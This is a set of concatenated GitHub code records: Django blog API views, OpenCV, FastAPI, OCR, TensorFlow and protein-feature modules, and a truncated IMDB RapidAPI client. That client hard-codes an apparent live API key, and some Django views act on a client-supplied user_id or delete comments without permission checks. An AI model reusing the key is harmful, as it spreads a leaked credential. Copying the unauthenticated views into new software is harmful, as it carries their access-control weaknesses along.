dt.now()\n\noutput = Path(args.output_dir)\nfile_count = 0\nfor page in page_generator_from_files(args.smiles, args.length):\n file_count += 1\n # save under dirs separately for job submitting.\n file_dir = output / 'd.{:04d}'.format(file_count)\n file_dir.mkdir(parents=True, exist_ok=True)\n file_path = file_dir / \"{}.{:04d}.smi\".format(output.stem, file_count)\n with open(file_path, 'w') as f:\n f.writelines(page)\n print(\"{}: saved {}\".format(dt.now(), file_path))\nprint(\"Total elapsed time: {}\".format(dt.now()-start))\n","repo_name":"hnlab/can-ai-do","sub_path":"dude/zinc_rdkit_psql/split_into_parts.py","file_name":"split_into_parts.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"}
+{"seq_id":"28602213966","text":"from posts.models import (\n Post,\n Category,\n BlogLike,\n BlogComment,\n CommentLike,\n Author\n\n)\nfrom .serializers import (\n PostSerializer,\n CategorySerializer,\n LikeGetSerializer,\n LikeSerializer,\n BlogComment,\n CommentGetSerializer,\n CommentPostSerializer,\n CommentPutSerializer,\n AuthorSerializer,\n PostCreateSerializer\n\n\n)\nfrom django.db.models import Count\nfrom .services.comment_view import create_comment\nfrom .services.like_view import press_like_to_product\nfrom rest_framework.views import APIView\nfrom django.views.decorators.http import require_GET\nfrom django.db.models import Q\nfrom ipware import get_client_ip\nfrom django.db import IntegrityError\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, pagination, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass AuthorPostsAPIView(generics.ListAPIView):\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author=Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\nclass AuthorPostsListCreateAPIView(generics.ListCreateAPIView):\n serializer_class = PostCreateSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n return Post.objects.filter(author=author)\n\n def perform_create(self, serializer):\n user_id = self.request.user\n author = Author.objects.get(user=user_id)\n # serializer.save(author=author)\n post = serializer.save(author=author)\n categories = self.request.data.get('categories', [])\n post.categories.set(categories)\n\nclass PostUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = [IsAuthenticated] \n\nclass PostList(generics.ListCreateAPIView):\n # queryset=Post.objects.all()\n serializer_class = PostSerializer\n\n def get_queryset(self):\n category = self.request.query_params.get('category', None)\n title = self.request.query_params.get('title', None)\n if category:\n queryset = Post.objects.filter(categories=category)\n elif title:\n queryset = Post.objects.filter(title__icontains=title)\n else:\n queryset = Post.objects.all()\n return queryset\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Post.objects.all()\n # permission_classes=[IsAuthenticated]\n serializer_class = PostSerializer\n lookup_field = 'pk'\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.increase_views()\n \"\"\"\n when deply it in a host you can increse by evey ip\n \"\"\"\n # Get the user's IP address\n # ip_address, _ = get_client_ip(request)\n\n # if ip_address: # If IP is detected\n # instance.increment_views(ip_address) # Call the increment_views method\n\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass CategoryList(generics.ListCreateAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\n# popular post\n\nclass MostViewedPostsAPIView(generics.ListAPIView):\n queryset = Post.objects.filter(status=True).order_by(\n '-views')[:8] # Query for popular posts\n serializer_class = PostSerializer\n\n\nclass MostLikedPostsAPIView(generics.ListAPIView):\n queryset = Post.objects.filter(status=True).annotate(\n like_count=Count('bloglike')).order_by('-like_count')[:8]\n serializer_class = PostSerializer\n# Blog tags list\n\n\nclass TagBlogList(generics.ListCreateAPIView):\n serializer_class = PostSerializer\n\n def get_queryset(self):\n tag = self.kwargs['tag']\n queryset = Post.objects.filter(tags__icontains=tag)\n return queryset\n\n\nclass LikeView(APIView):\n # permission_classes = [IsAuthenticated]\n\n def get(self, request, *args, **kwargs):\n if kwargs:\n queryset = BlogLike.objects.filter(\n blog_item__pk=kwargs[\"blog_item_pk\"])\n serializer = LikeGetSerializer(queryset, many=True)\n else:\n queryset = BlogLike.objects.all()\n serializer = LikeGetSerializer(queryset, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n\n user = User.objects.get(pk=int(request.data[\"user_id\"]))\n post = Post.objects.get(pk=int(request.data[\"blog_item\"]))\n like = BlogLike.objects.filter(user=user, blog_item=post)\n if like:\n like.like_status = \"false\"\n like.delete()\n msg = False\n else:\n BlogLike.objects.create(\n user=user, blog_item=post, like_status=True)\n msg = True\n return Response({\"msg\": msg})\n\n\n@csrf_exempt\n@require_GET\ndef search_blogs(request):\n search_query = request.GET.get('q', '')\n\n # Perform the search query on the Blog model\n search_results = Post.objects.filter(\n Q(title__icontains=search_query) | Q(body__icontains=search_query)\n )\n\n # Serialize the search results\n serialized_results = [{'title': blog.title, 'body': blog.body}\n for blog in search_results]\n\n return JsonResponse(serialized_results, safe=False)\n\n# =========== comments views\n\n\nclass CommentBlogView(APIView):\n # permission_classes = [IsAuthenticated]\n\n def get(self, request, *args, **kwargs):\n\n if kwargs:\n queryset = BlogComment.objects.filter(\n blog_item__pk=kwargs[\"blog_item\"], parent=None\n )\n serializer = CommentGetSerializer(\n queryset, many=True, context={'request': request})\n else:\n queryset = BlogComment.objects.all()\n serializer = CommentGetSerializer(\n queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n serializer = CommentPostSerializer(data=request.data)\n user = User.objects.get(pk=int(request.data[\"user_id\"]))\n\n if serializer.is_valid():\n comment = create_comment(**serializer.data, user=user)\n return Response(\n CommentGetSerializer(instance=comment, context={\n 'request': request}).data,\n status=status.HTTP_201_CREATED,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def put(self, request, pk):\n post = BlogComment.objects.get(pk=pk)\n data = {**request.data, \"user\": request.user.id}\n serializer = CommentPutSerializer(instance=post, data=data)\n if serializer.is_valid():\n instance = serializer.save()\n newSerializer = CommentGetSerializer(\n instance=instance, context={'request': request})\n return Response(newSerializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n post = BlogComment.objects.get(pk=pk)\n post.delete()\n return Response({\"message\": \"Item was successfully deleted\"})\n# class CommentBlogView(APIView):\n# # permission_classes = [IsAuthenticated]\n\n# def get(self, request, *args, **kwargs):\n\n# if kwargs:\n# queryset = BlogComment.objects.filter(\n# blog_item__pk=kwargs[\"blog_item\"], parent=None\n# )\n# serializer = CommentGetSerializer(queryset, many=True)\n# else:\n# queryset = BlogComment.objects.all()\n# serializer = CommentGetSerializer(queryset, many=True)\n# return Response(serializer.data)\n\n# def post(self, request, *args, **kwargs):\n# serializer = CommentPostSerializer(data=request.data)\n# user=User.objects.get(pk=int(request.data[\"user_id\"]))\n\n# if serializer.is_valid():\n# comment = create_comment(**serializer.data, user=user)\n# return Response(\n# CommentGetSerializer(instance=comment).data,\n# status=status.HTTP_201_CREATED,\n# )\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n# def put(self, request, pk):\n# post = BlogComment.objects.get(pk=pk)\n# data = {**request.data, \"user\": request.user.id}\n# serializer = CommentPutSerializer(instance=post, data=data)\n# if serializer.is_valid():\n# instance = serializer.save()\n# newSerializer = CommentGetSerializer(instance=instance)\n# return Response(newSerializer.data, status=status.HTTP_200_OK)\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n# def delete(self, requset, pk):\n# post = BlogComment.objects.get(pk=pk)\n# post.delete()\n# return Response({\"message\": \"Item was succesfully deleted\"})\n\n\n# class CommentLikeView(APIView):\n# permission_classes = [IsAuthenticated]\n\n# def get(self, request, *args, **kwargs):\n# if kwargs:\n# queryset = CommentLike.objects.filter(\n# comment_blog_item__blog_item__pk=kwargs[\"comment_blog_item_pk\"]\n# )\n# serializer = CommentLikeGetSerializer(queryset, many=True)\n# else:\n# queryset = CommentLike.objects.all()\n# serializer = CommentLikeGetSerializer(queryset, many=True)\n\n# return Response(serializer.data)\n\n# def post(self, request, *args, **kwargs):\n# serializer = CommentLikePostSerializer(data=request.data)\n# if serializer.is_valid():\n# like_id = press_like_to_comment(request, request.data[\"comment_blog_item\"])\n# return Response(\n# {**serializer.data, \"like_id\": like_id}, status=status.HTTP_201_CREATED\n# )\n# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def check_comment_like_exists(request, comment_id):\n# user = request.user\n# try:\n# CommentLike.objects.get(user=user, comment_blog_item__id=comment_id)\n# return Response({\"result\": True})\n# except Exception as e:\n# return Response({\"result\": False})\n\n\n# @api_view([\"GET\"])\n# @permission_classes([IsAuthenticated])\n# def get_blogs_for_user(request):\n# user = request.user\n# queryset = user.blogitem_set.all()\n\n# serializer = BlogSerializer(queryset, many=True)\n# return Response(serializer.data)\n","repo_name":"abbasalirezaei/Django-React-Bolg-App-","sub_path":"backend/posts/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"12944767569","text":"import numpy as ny \nimport cv2\n\nimg = cv2.imread(\"castle.jpg\",1)\ncv2.imwrite('castle-mean-formula.jpg',img)\ncv2.imwrite('castle-luminosity-formula.jpg',img)\ngray1 = cv2.imread('castle-gray1.jpg',1)\ngray2 = cv2.imread('castle-gray2.jpg',1)\nrow,col,color = gray1.shape\n\n#first method - using mean formula\nfor i in range(0,row):\n for j in range(0,col):\n b,g,r = gray1[i,j]\n gray=(int(r)+int(g)+int(b))/3\n gray1[i,j]=gray\ncv2.imshow('castle - grayscale - mean formula',gray1)\ncv2.imwrite('castle-mean-formula.jpg',gray1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#second method - using luminosity formula\nfor i in range(0, row):\n for j in range(0, col):\n b,g,r=gray2[i,j]\n gray=(int(b)*0.07 + int(g)*0.72 + int(r)*0.21)\n gray2[i,j]=gray\ncv2.imwrite('castle-luminosity-formula.jpg',gray2)\ncv2.imshow('castle - grayscale - luminosity formula',gray2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"rohit-mp/ImgProc-OpenCV","sub_path":"ColorToGray/color-to-grayscale.py","file_name":"color-to-grayscale.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21056384677","text":"#!/usr/bin/python3\nimport unittest\nimport pep8\nfrom models.square import Square\n\n\nclass testcase(unittest.TestCase):\n \"\"\"this is the class for unittest\"\"\"\n\n def test_pep8(self):\n \"\"\"pep8 test\"\"\"\n style = pep8.StyleGuide()\n res = style.check_files([\"models/square.py\"])\n self.assertEqual(res.total_errors, 0, \"pep8 error\")\n\n def test_area(self):\n \"\"\"check area\"\"\"\n s1 = Square(5)\n self.assertEqual(s1.area(), 25)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rania3103/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"41915623840","text":"import json\n\nfrom fastapi import APIRouter, HTTPException, Path\nfrom pydantic import HttpUrl\n\nfrom src.api import schemas\nfrom src.utils.scrapers import newsletter_scraper\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=list[schemas.newsletter.NewsletterInfo])\ndef get_all_newsletters():\n \"\"\"\n 取得所有的電子報。\n \"\"\"\n return newsletter_scraper.get_all_newsletters_list()\n\n\n@router.get(\n \"/{newsletter_name}\", response_model=list[schemas.newsletter.NewsletterData]\n)\ndef get_newsletter_by_name(\n newsletter_name: schemas.newsletter.NewsletterName = Path(\n ..., example=\"國立清華大學學生會電子報\", description=\"抓取的電子報名稱\"\n )\n):\n \"\"\"\n 透過電子報名稱取得指定的電子報列表。\n \"\"\"\n with open(\"data/newsletter_list.json\", \"r\", encoding=\"utf-8\") as f:\n data = f.read()\n data = json.loads(data)\n newsletter_link = None\n for newsletter in data:\n if newsletter[\"name\"] == newsletter_name:\n newsletter_link = newsletter[\"link\"]\n break\n if newsletter_link is None:\n raise HTTPException(status_code=404, detail=\"Newsletter not found\")\n return newsletter_scraper.get_selected_newsletter_list(newsletter_link)\n\n\n@router.get(\n \"/paths/{newsletter_link:path}\",\n response_model=list[schemas.newsletter.NewsletterData],\n)\ndef get_newsletter_by_link(\n newsletter_link: HttpUrl = Path(\n ...,\n example=\"https://newsletter.cc.nthu.edu.tw/nthu-list/index.php/zh/home-zh-tw/listid-44-\",\n description=\"抓取的電子報網址\",\n )\n):\n \"\"\"\n 透過電子報網址取得指定的電子報列表。\n \"\"\"\n return newsletter_scraper.get_selected_newsletter_list(str(newsletter_link))\n","repo_name":"NTHU-SA/NTHU-Data-API","sub_path":"src/api/routers/newsletters.py","file_name":"newsletters.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"33404162558","text":"import cv2\nimport numpy as np\nimport pytesseract\nimport os\n\nMAX_FEATURES = 500\nGOOD_MATCH_PERCENT = 0.15\n\nclass dataReader:\n\n\n def __init__(self, pointsOfInterest, query):\n self.pointsOfInterest = pointsOfInterest\n self.query = query\n self.per = 90\n\n def alignImages(self, im1, im2):\n\n # Convert images to grayscale\n im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n\n # Detect ORB features and compute descriptors.\n orb = cv2.ORB_create(MAX_FEATURES)\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n\n # Match features.\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n matches = matcher.match(descriptors1, descriptors2, None)\n\n # Sort matches by score\n matches.sort(key=lambda x: x.distance, reverse=False)\n\n # Remove not so good matches\n numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\n matches = matches[:numGoodMatches]\n\n # Draw top matches\n imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\n h, w, c = im1.shape\n cv2.imshow(\"matches\", cv2.resize(imMatches,(w//2,h//2)))\n\n # Extract location of good matches\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n for i, match in enumerate(matches):\n points1[i, :] = keypoints1[match.queryIdx].pt\n points2[i, :] = keypoints2[match.trainIdx].pt\n\n # Find homography\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\n\n # Use homography\n height, width, channels = im2.shape\n\n\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\n cv2.imwrite(\"matches.jpg\", im1Reg)\n\n return im1Reg, h\n\n def readData(self, image):\n # load query\n # ----\n\n img1 = cv2.imread(self.query)\n\n filestr = image.read()\n #convert string data to numpy array\n npimg = np.fromstring(filestr, np.uint8)\n # convert numpy array to image\n img2 = cv2.imdecode(npimg, cv2.IMREAD_COLOR)\n\n imgScan, asx = self.alignImages(img2, img1)\n\n imgShow = imgScan.copy()\n\n imgMask = np.zeros_like(imgShow)\n subdata = {}\n\n # points of interest\n for x,r in enumerate(self.pointsOfInterest):\n cv2.rectangle(imgMask,(r[0][0],r[0][1]),(r[1][0],r[1][1]),(0,255,0),cv2.FILLED)\n imgShow = cv2.addWeighted(imgShow, 0.99, imgMask, 0.1,0)\n imgCrop = imgScan[r[0][1]:r[1][1], r[0][0]:r[1][0]]\n\n text = pytesseract.image_to_string(imgCrop, 'ces').strip()\n text = str(text)\n\n if text:\n if r[2] == 'array':\n try:\n subdata[r[3]].append(text)\n except:\n subdata[r[3]] = []\n subdata[r[3]].append(text)\n else:\n subdata[r[3]] = text\n\n return subdata\n","repo_name":"ondrakubicek/formReader","sub_path":"src/dataReader/dataReader.py","file_name":"dataReader.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"20256308707","text":"import tensorflow as tf\n\nclass MidLevelFeatNet(tf.keras.layers.Layer):\n \"\"\"\n This class represents the Mid-Level Features Network which extracts local mid-level features\n from the low-level features and passes them to the Fusion Layer.\n \"\"\"\n\n def __init__(self, **kwargs): \n super(MidLevelFeatNet, self).__init__(**kwargs)\n self.net_layers = []\n self.net_layers.append(tf.keras.layers.Conv2D(filters=512, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n self.net_layers.append(tf.keras.layers.Conv2D(filters=256, kernel_size=(3,3), strides=(1,1), padding='same'))\n self.net_layers.append(tf.keras.layers.Activation(tf.nn.relu))\n self.net_layers.append(tf.keras.layers.BatchNormalization())\n\n @tf.function\n def call(self, x, training=False):\n for layer in self.net_layers:\n x = layer(x, training=training)\n return x\n\n def get_config(self):\n config = super(MidLevelFeatNet, self).get_config()\n return config\n \n @classmethod\n def from_config(cls, config):\n return cls(**config)","repo_name":"stmeinert/Recolorization_IANN","sub_path":"src/iizuka/mid_level_features_network.py","file_name":"mid_level_features_network.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"22314699399","text":"\"\"\"\nFunctions to compute features for ligand and protein backbone graphs.\n\"\"\"\nimport numpy as np\nfrom rdkit import Chem\nfrom typing import List, Union, Set, Any\nfrom Bio.PDB.Residue import Residue\nfrom Bio.PDB.DSSP import dssp_dict_from_pdb_file\nfrom typing import List, Tuple, Dict\n\nfrom holoprot.feat import SECONDARY_STRUCTS, AMINO_ACIDS, ATOM_LIST\nfrom holoprot.feat import IMP_VALENCE, EXP_VALENCE, DEGREES, ATOM_FDIM\nfrom holoprot.feat import BOND_FDIM, BOND_TYPES\n\nidxfunc = lambda a: a.GetAtomMapNum() - 1\nbond_idx_fn = lambda a, b, mol: mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx()).GetIdx()\n\nclass ResidueProp(object):\n \"\"\"Wrapper class that holds all attributes of a protein residue.\"\"\"\n\n def __init__(self,\n residue: Residue,\n sec: str,\n sas: float,\n hydrophobicity: float,\n res_depth: float = None,\n ca_depth: float = None) -> None:\n \"\"\"\n Parameters\n ----------\n residue: Residue,\n Instance of the Bio.PDB.Residue.Residue\n sec: str,\n Single letter indicating the secondary structure. Refer SECONDARY_STRUCTS\n above for possible codes.\n sas: float,\n Solvent accessible surface area (TODO: (vsomnath): Normalize?)\n res_depth: float,\n Depth of residue, calculated as average depth of all atoms\n ca_depth: float,\n Depth of Calpha atom of the residue\n \"\"\"\n self.name = residue.get_resname()\n self.sec = sec\n self.sas = sas\n self.res_depth = res_depth\n self.ca_depth = ca_depth\n self.hydrophobicity = hydrophobicity # Hydrophobicity using the Kyte-Doolittle scale\n\n\nclass AtomProp(object):\n \"\"\"Wrapper class that holds all properties of an atom.\"\"\"\n\n def __init__(self, atom: Chem.Atom) -> None:\n \"\"\"\n Parameters\n ----------\n atom: Chem.Atom,\n Instance of rdkit.Chem.Atom\n \"\"\"\n self.symbol = atom.GetSymbol()\n self.degree = atom.GetDegree()\n self.exp_valence = atom.GetExplicitValence()\n self.imp_valence = atom.GetImplicitValence()\n self.is_aromatic = atom.GetIsAromatic()\n\n\nclass BondProp(object):\n \"\"\"Wrapper class that holds all properties of a bond.\"\"\"\n\n def __init__(self, bond: Chem.Bond) -> None:\n \"\"\"\n Parameters\n ----------\n bond: Chem.Bond,\n Instance of rdkit.Chem.Bond\n \"\"\"\n self.bond_type = bond.GetBondType()\n self.is_conj = bond.GetIsConjugated()\n self.is_ring = bond.IsInRing()\n\n\ndef onek_encoding_unk(x: Any, allowable_set: Union[List, Set]) -> List:\n \"\"\"Converts x to one hot encoding.\n\n Parameters\n ----------\n x: Any,\n An element of any type\n allowable_set: Union[List, Set]\n Allowable element collection\n\n Returns\n -------\n list, indicating the one hot encoding of x in allowable_set\n \"\"\"\n if x not in allowable_set:\n x = allowable_set[-1]\n return list(map(lambda s: float(x == s), allowable_set))\n\n\ndef get_atom_features(atom_prop: AtomProp, **kwargs) -> np.ndarray:\n \"\"\"\n Get atom features. The atom features computed\n\n Parameters\n ----------\n atom: Chem.Atom,\n Atom object from RDKit\n\n Returns\n -------\n atom_features: np.ndarray,\n Array of atom features\n \"\"\"\n if atom_prop == \"*\":\n return np.array([0] * ATOM_FDIM)\n atom_features = np.array(\n onek_encoding_unk(atom_prop.symbol, ATOM_LIST) +\n onek_encoding_unk(atom_prop.degree, DEGREES) +\n onek_encoding_unk(atom_prop.exp_valence, EXP_VALENCE) +\n onek_encoding_unk(atom_prop.imp_valence, IMP_VALENCE) +\n [float(atom_prop.is_aromatic)])\n return atom_features\n\n\ndef get_bond_features(bond_prop: BondProp, **kwargs) -> np.ndarray:\n \"\"\"\n Get bond features. Features computed are a one hot encoding of the bond type,\n its aromaticity and ring membership.\n\n Parameters\n ----------\n bond: Chem.Bond,\n bond object\n\n Returns\n -------\n bond_features: np.ndarray,\n Array of bond features\n \"\"\"\n if bond_prop == \"*\":\n return np.array([0] * BOND_FDIM)\n bt = bond_prop.bond_type\n bond_features = [float(bt == bond_type) for bond_type in BOND_TYPES[1:]]\n bond_features.extend([float(bond_prop.is_conj), float(bond_prop.is_ring)])\n bond_features = np.array(bond_features, dtype=np.float32)\n return bond_features\n\n\ndef get_residue_features(residue_prop: ResidueProp,\n use_depth: bool = False,\n **kwargs) -> np.ndarray:\n \"\"\"Get residue features.\n\n Parameters\n ----------\n residue_prop: ResidueProp\n Instance of the ResidueProp class that captures properties of a residue\n\n Returns\n -------\n res_features: np.ndarray,\n Array of residue features\n \"\"\"\n if residue_prop == \"*\":\n if use_depth:\n return np.array(\n [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 4))\n else:\n return np.array(\n [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 2))\n res_features = onek_encoding_unk(residue_prop.name, AMINO_ACIDS) + \\\n onek_encoding_unk(residue_prop.sec.upper(), SECONDARY_STRUCTS) + \\\n [residue_prop.sas, residue_prop.hydrophobicity]\n if use_depth:\n res_features.extend([residue_prop.res_depth, residue_prop.ca_depth])\n res_features = np.array(res_features)\n return res_features\n\n\ndef compute_normal(residue: Residue) -> np.ndarray:\n \"\"\"\n Compute the normal vector for a given residue. The normal vector is estimated\n as the cross product of the vectors formed by the difference of Calpha, C and\n O coordinates. The normal vector is length normalized to get a unit vector.\n\n Parameters\n ----------\n residue: Residue,\n Residue for which we want to compute normal\n\n Returns\n -------\n normal: np.ndarray,\n The normal vector for the residue\n \"\"\"\n x_ca = residue['CA'].get_coord()\n x_c = residue['C'].get_coord()\n x_o = residue['O'].get_coord()\n x_oc = x_o - x_c\n x_cac = x_ca - x_c\n normal = np.cross(x_oc, x_cac)\n normal /= (np.sqrt(np.sum(normal**2) + 1e-8)) # Normalize by length\n return normal\n\n\ndef compute_angle(residue_pair: Tuple[Residue]) -> float:\n \"\"\"\n Compute the angle between two residues. The angle is estimated as the cosine\n inverse of the dot product between the normal vectors of the two residues. The\n angle is normalized by dividing it by 2 * \\pi\n\n Parameters\n ----------\n residue_pair: Tuple[Residue]\n The pair of residues between which we want to estimate the angle.\n\n Returns\n -------\n normalized angle (float) between the residues\n \"\"\"\n res_i, res_j = residue_pair\n norm_i = compute_normal(res_i)\n norm_j = compute_normal(res_j)\n\n angle = np.arccos(norm_i.dot(norm_j))\n return angle / (2 * np.pi)\n\n\ndef get_contact_features(residue_pair: Tuple[Residue],\n mode: str = 'ca',\n sigma: float = 0.01,\n **kwargs) -> np.ndarray:\n \"\"\"\n Gets contact features. The features computed are the RBF kernel over the\n distance between residues and the angle between the residues. The RBF kernel's\n width is modulated by the parameter `sigma`, and the mode to compute distance\n is controlled by `mode` argument.\n\n Parameters\n ----------\n residue_pair: Tuple[Residue],\n pass\n mode: str, (default ca)\n Compute distance between two residues. Allowed options are\n `ca` (distance between calpha atoms) and `com` (distance between\n center of masses of residues)\n sigma: float\n Width of the gaussian kernel over the contact.\n\n Returns\n -------\n edge_features: np.ndarray,\n Features of the contact between residues\n \"\"\"\n if residue_pair == \"*\":\n return np.array([0, 0])\n\n res_i, res_j = residue_pair\n if mode == 'ca':\n coord_i = res_i['CA'].get_coord()\n coord_j = res_j['CA'].get_coord()\n\n elif mode == 'com':\n coord_i = np.mean(\n [atom.get_coord() for atom in res_i.get_list()], axis=0)\n coord_j = np.mean(\n [atom.get_coord() for atom in res_j.get_list()], axis=0)\n\n else:\n raise ValueError(\n f\"Computing distance with mode {mode} is not supported.\")\n\n y = coord_i - coord_j\n dist = np.exp(-np.sum(y**2) / sigma**2)\n angle = compute_angle(residue_pair)\n\n edge_features = np.array([dist, angle])\n return edge_features\n\n\ndef get_secondary_struct_features(pdb_file: str,\n dssp_bin: str = 'dssp') -> Dict[str, List]:\n \"\"\"Compute secondary structure features for the protein using DSSP.\n\n Parameters\n ----------\n pdb_file: str,\n PDB file for the protein.\n dssp_bin: str,\n Path to the DSSP binary executable\n\n Returns\n -------\n dssp_dict: Dict[str, List]\n Dictionary containing the secondary structure features for residues\n \"\"\"\n dssp_dict = dssp_dict_from_pdb_file(pdb_file, DSSP=dssp_bin)[0]\n return dssp_dict","repo_name":"vsomnath/holoprot","sub_path":"holoprot/feat/complex.py","file_name":"complex.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"}
+{"seq_id":"29526546357","text":"import requests\nimport json\n\n\n\nHOST_NAME = \"imdb8.p.rapidapi.com\"\nAPI_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef __init__(self, year):\n \n HOST_NAME = \"imdb8.p.rapidapi.com\"\n API_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef get_movie_id(movie_name):\n '''\n Gets the id of a movie which can be used to get info from IMDB rapidAPI about that movie\n \n Parameters:\n movie_name(String): The name of a movie\n Returns:\n \n String\n The id of a movie used in IMDB api (eg. 'tt1049413')\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/find\"\n \n querystring = {\"q\":movie_name}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n data = response.json()\n data = data[\"results\"][0][\"id\"]\n return(data[7:-1])\n\n#print(get_movie_id(\"Up\"))\n#/title/tt0110912/\n\n\ndef get_plot_overview(movie_id):\n '''\n Gets the plot overview of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The plot overview of a movie \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-overview-details\"\n # get the id of given movie\n #movie_id = get_movie_id(movie_id)\n querystring = {\"tconst\":movie_id,\"currentCountry\":\"US\"}\n\n #print(movie_id)\n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n plot_overview = response.json()\n #print(plot_overview)\n plot_overview = plot_overview[\"plotSummary\"][\"text\"]\n return (plot_overview)\n\n#print(get_plot_overview(\"tt0110912\"))\n\ndef get_top_100():\n '''\n Gets the top 100 IMDB movies from IMDB rapidAPI \n \n Parameters:\n None\n Returns:\n \n List\n A list of 1oo strings of movie id's \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-most-popular-movies\"\n \n querystring = {\"purchaseCountry\":\"US\",\"homeCountry\":\"US\",\"currentCountry\":\"US\"}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n top_100_id = []\n for i in response:\n top_100_id.append(i[7:-1])\n return(top_100_id)\n \n#print(get_top_100())\n\ndef get_short_plot(movie_id):\n '''\n Gets the plot overview of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n A short plot overview of a movie \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n \n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n plot = response[\"plots\"][0][\"text\"]\n return(plot)\n \n#print(get_short_plot(\"tt0110912\"))\n\ndef get_medium_plot(movie_id):\n '''\n Gets the plot overview of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n A short plot overview of a movie \n \n '''\n url = 